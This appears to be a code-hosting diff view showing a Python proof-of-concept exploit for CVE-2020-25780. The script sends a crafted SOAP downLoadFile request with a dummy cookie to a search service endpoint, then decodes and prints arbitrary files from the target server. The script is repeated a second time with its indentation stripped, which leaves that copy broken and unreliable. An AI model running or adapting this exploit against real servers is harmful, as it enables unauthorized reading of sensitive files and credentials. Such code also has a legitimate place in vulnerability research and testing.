milo2012 · February 8, 2022 06:11
diff --git a/CVE-2020-25780.py b/CVE-2020-25780.py
 import optparse
 import requests
 import xml.etree.ElementTree as ET
 import xmltodict
 import base64

 def fixed_xml_body_as_string(filename):
 	text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
 	text+='   <soapenv:Header/>'
 	text+='	   <soapenv:Body>'
 	text+='		  <tem:downLoadFile>'
 	text+='			 <tem:path>'+filename+'</tem:path>'
 	text+='		  </tem:downLoadFile>'
 	text+='	   </soapenv:Body>'
 	text+='	</soapenv:Envelope>'
 	return text
 	
 def test_send_xml_body_from_string_check_status_code_and_content_type(url,filename):
    response = requests.post(
        url+"/SearchSvc/CVSearchService.svc",
        headers={"Content-Type": "text/xml", "cookie": "Login", "soapaction": "http://tempuri.org/ICVSearchSvc/downLoadFile"},
        data=fixed_xml_body_as_string(filename)
    )
    return(response.status_code,response.content)

 parser = optparse.OptionParser()
 parser.add_option('-u', action="store", dest="url")
 parser.add_option('-f', action="store", dest="filename")
 options, remainder = parser.parse_args()
 if options.url and options.filename:	
 	responseCode,xmlData=test_send_xml_body_from_string_check_status_code_and_content_type(options.url,options.filename)
 	if responseCode==200:
 		root = ET.fromstring(xmlData)
 		d = xmltodict.parse(xmlData)
 		for i in sorted (d): 
 			x = d[i]
 			for i1 in sorted (x): 
 				if i1=='s:Body':
 					y = x[i1]
 					for i2 in sorted (y): 	
 						if i2=='downLoadFileResponse':
 							z = y[i2]
 							for i3 in sorted (z): 	
 								if i3=='downLoadFileResult':
 									base64_message=base64.b64decode(z[i3])
 									print(base64_message)
	import optparse
	import requests
	import xml.etree.ElementTree as ET
	import xmltodict
	import base64

	def fixed_xml_body_as_string(filename):
	text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
	text+=' <soapenv:Header/>'
	text+=' <soapenv:Body>'
	text+=' <tem:downLoadFile>'
	text+=' <tem:path>'+filename+'</tem:path>'
	text+=' </tem:downLoadFile>'
	text+=' </soapenv:Body>'
	text+=' </soapenv:Envelope>'
	return text

	def test_send_xml_body_from_string_check_status_code_and_content_type(url,filename):
	response = requests.post(
	url+"/SearchSvc/CVSearchService.svc",
	headers={"Content-Type": "text/xml", "cookie": "Login", "soapaction": "http://tempuri.org/ICVSearchSvc/downLoadFile"},
	data=fixed_xml_body_as_string(filename)
	)
	return(response.status_code,response.content)

	parser = optparse.OptionParser()
	parser.add_option('-u', action="store", dest="url")
	parser.add_option('-f', action="store", dest="filename")
	options, remainder = parser.parse_args()
	if options.url and options.filename:
	responseCode,xmlData=test_send_xml_body_from_string_check_status_code_and_content_type(options.url,options.filename)
	if responseCode==200:
	root = ET.fromstring(xmlData)
	d = xmltodict.parse(xmlData)
	for i in sorted (d):
	x = d[i]
	for i1 in sorted (x):
	if i1=='s:Body':
	y = x[i1]
	for i2 in sorted (y):
	if i2=='downLoadFileResponse':
	z = y[i2]
	for i3 in sorted (z):
	if i3=='downLoadFileResult':
	base64_message=base64.b64decode(z[i3])
	print(base64_message)